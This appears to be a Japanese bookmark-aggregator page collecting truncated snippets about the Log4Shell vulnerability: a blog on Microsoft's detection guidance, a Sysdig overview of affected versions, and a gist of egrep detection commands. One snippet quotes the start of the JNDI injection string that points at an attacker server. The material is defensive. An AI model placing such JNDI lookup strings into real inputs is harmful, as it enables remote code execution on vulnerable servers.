この年末年始の休みに docs を眺めていたら、 Log4j の問題が最上部のヘッダーに表示されるようになっていました。 この内容はなかなか難しかったのでかいつまんで意識しておきたいところを確認しておきたいと思います。 https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/?WT.mc_id=M365-MVP-5002496 この内容の概要としては、マイクロソフトがウォッチしている Log4j 関連の問題に関する解析状況を伝えていました。 この問題に対する Web アクセスの大半は以下のタイプのログで判断できるようです。 ${jndi:ldap://[attacker s
Javaのログユーティリティlog4jに致命的な脆弱性CVE-2021-44228、通称Log4Shellが発見されました。 この脆弱性はリモートコード実行を可能にし、多くのアプリケーションや企業で使用されているlog4jを危険にさらしています。 CVE-2021-44228は、log4jのバージョン2.0-beta9から2.14.1までに影響を及ぼし、脆弱性を修正したバージョン2.15.0がリリースされましたが、新たなサービス拒否(DoS)脆弱性が発見されたため、2.16.0へのアップデートが推奨されています。 この記事では、log4jの脆弱性の概要、その影響、検出と軽減の方法について説明します。 また、log4jは広く使用されており、この脆弱性の影響は大きいため、速やかな対策が求められています。 詳細はこちら Sysdigに関するお問い合わせはこちらから 最近の投稿 カテゴリー アーカ
log4j_rce_detection.md log4j RCE Exploitation Detection You can use these commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228 Grep / Zgrep This command searches for exploitation attempts in uncompressed files in folder /var/log and all sub folders sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log This
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
処理を実行中です
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く